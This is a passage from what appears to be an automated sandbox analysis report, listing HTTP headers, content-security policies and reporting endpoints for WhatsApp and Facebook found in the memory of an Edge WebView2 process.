'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0strict-transport-security:max-age=
                  Source: msedgewebview2.exe, 0000001D.00000002.3696682799.00002DDC0068C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <@ror_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;origin-agent-cluster:?0strict-transport-security:max-age=
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: =( www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: =)`www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000003.2986608844.00002DDC017BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3714898025.00002DDC017C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ?www.facebook.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com[ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: B_@ata: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C;https://www.facebook.com/browser_reporting/coep/?minimize=0C;https://www.facebook.com/browser_reporting/coop/?minimize=0@8https://www.whatsapp.com/whatsapp_browser_error_reports/@8https://www.whatsapp.com/whatsapp_browser_error_reports/ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C;https://www.facebook.com/browser_reporting/coep/?minimize=0C;https://www.facebook.com/browser_reporting/coop/?minimize=0UMhttps://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown@8https://www.whatsapp.com/whatsapp_browser_error_reports/ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: D=( www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: D=)`www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: DB_@ata: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3662236273.00001B4400664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: DfE@ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.comD equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKContent-Type: text/html;charset=utf-8Vary: Accept-Encoding, User-Agent, Accept-LanguageVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: cross-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: unsafe-none;report-to="coop_report"Pragma: no-cacheCache-Control: no-cacheExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.c
                  Source: msedgewebview2.exe, 00000026.00000003.2376075947.00004B18009EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKContent-Type: text/html;charset=utf-8Vary: Accept-Encoding, User-Agent, Accept-LanguageVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: cross-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: unsafe-none;report-to="coop_report"Pragma: no-cacheCache-Control: no-cacheExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.c
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKContent-Type: text/html;charset=utf-8Vary: Accept-Encoding, User-Agent, Accept-LanguageVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: cross-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: unsafe-none;report-to="coop_report"Pragma: no-cacheCache-Control: no-cacheExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.c
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKContent-Type: text/html;charset=utf-8Vary: Accept-Encoding, User-Agent, Accept-LanguageVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: cross-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: unsafe-none;report-to="coop_report"Pragma: no-cacheCache-Control: no-cacheExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.c
                  Source: msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKVary: Accept-EncodingContent-Type: text/css; charset=utf-8Last-Modified: Mon, 01 Jan 2001 08:00:00 GMTExpires: Fri, 28 Feb 2025 23:48:07 GMTCache-Control: public,max-age=31536000,immutablereport-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy-report-only: clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"X-Content-Type-Options: nosniffreporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"content-md5: TTHzaz+Fb2Yilw1ZTi8HYA==X-FB-Debug: iz1oUbWB1I0ufWFzZ2KrhsiOkWGmO3mU/w1PVn5TKOMAZU8KkGteraIiQmjS6ig6zs20nOl/1zqEEKlinyjudQ==cross-origin-resource-policy: cross-origintiming-allow-origin: *Access-Control-Allow-Origin: *Accept-Ranges: bytesDate: Sun, 10 Mar 2024 16:46:09 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=203, rtx=0, c=14, mss=1274, tbw=3338, tp=-1, tpl=-1, uplat=1, ullat=-1Alt-Svc: h3=":443"; ma=86400 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKVary: Accept-EncodingContent-Type: text/css; charset=utf-8Last-Modified: Mon, 01 Jan 2001 08:00:00 GMTExpires: Thu, 27 Feb 2025 13:44:45 GMTCache-Control: public,max-age=31536000,immutablereport-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy: force-load-at-toppermissions-policy-report-only: clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"X-Content-Type-Options: nosniffreporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"origin-agent-cluster: ?0content-md5: /yjTedR4bvWD4O6B5GL9ew==X-FB-Debug: cQXeTUoXyAoDHjMJaVN94xeP1V1Pc7GYpsSOsK1rXPWZVEnmFMTyMfO9KMJ5ePVJE4IbalQqfp7dHtiw5CZqYg==cross-origin-resource-policy: cross-origintiming-allow-origin: *Access-Control-Allow-Origin: *Accept-Ranges: bytesDate: Sun, 10 Mar 2024 16:46:09 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=204, rtx=0, c=14, mss=1274, tbw=3337, tp=-1, tpl=-1, uplat=0, ullat=-1Alt-Svc: h3=":443"; ma=86400 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2373107215.00001B4400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: same-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYorigin-agent-cluster: ?0Content-Type: text/html; charset="utf-8"X-FB-Debug: Mb2IN1fc/+B6XPejVaLoN5yA/p166PZx0SC3zZZNfL6cKIcwgxG54fyRps1JlebMO3GCI6J9CALBkPd8QttIaA==Date: Sun, 10 Mar 2024 16:46:06 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=198, rtx=0, c=14, mss=1274, tbw=3337,
                  Source: msedgewebview2.exe, 00000020.00000003.2373107215.00001B4400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200 OKVary: Accept-Encodingreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy: same-origincross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: 